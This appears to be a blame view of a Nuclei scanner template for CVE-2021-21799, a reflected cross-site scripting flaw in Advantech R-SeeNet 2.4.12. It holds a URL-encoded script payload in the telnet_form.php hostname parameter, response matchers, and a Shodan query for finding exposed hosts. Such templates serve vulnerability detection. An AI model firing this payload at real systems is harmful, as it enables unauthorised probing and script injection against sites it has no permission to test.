2022-08-05 05:55:22 +00:00
|
|
|
id: CVE-2021-21799
|
|
|
|
|
|
|
|
info:
|
2022-09-08 13:28:46 +00:00
|
|
|
name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting
|
2022-08-05 05:55:22 +00:00
|
|
|
author: arafatansari
|
|
|
|
severity: medium
|
|
|
|
description: |
|
2022-09-08 13:28:46 +00:00
|
|
|
Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality.
|
2022-08-05 05:55:22 +00:00
|
|
|
reference:
|
|
|
|
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270
|
2022-08-05 06:06:50 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-21799
|
2022-08-06 00:08:17 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
|
|
|
cve-id: CVE-2021-21799
|
|
|
|
cwe-id: CWE-79
|
2023-07-15 16:29:17 +00:00
|
|
|
epss-score: 0.85976
|
2023-07-11 19:49:27 +00:00
|
|
|
cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
|
2022-08-05 05:55:22 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2022-08-05 06:06:50 +00:00
|
|
|
shodan-query: http.html:"R-SeeNet"
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: advantech
|
|
|
|
product: r-seenet
|
2022-08-05 23:44:09 +00:00
|
|
|
tags: cve,cve2021,xss,r-seenet
|
2022-08-05 05:55:22 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-08-05 05:55:22 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2022-08-05 06:06:50 +00:00
|
|
|
- "{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E"
|
2022-08-05 06:04:26 +00:00
|
|
|
|
2022-08-05 05:55:22 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2022-08-05 06:14:29 +00:00
|
|
|
part: body
|
2022-08-05 23:44:09 +00:00
|
|
|
words:
|
|
|
|
- "<title>Telnet </title><script>alert(document.domain)</script><title></title>"
|
2022-08-05 05:55:22 +00:00
|
|
|
|
|
|
|
- type: word
|
2022-08-05 23:44:09 +00:00
|
|
|
part: header
|
2022-08-05 05:55:22 +00:00
|
|
|
words:
|
2022-08-05 06:14:29 +00:00
|
|
|
- "text/html"
|
2022-08-05 05:55:22 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|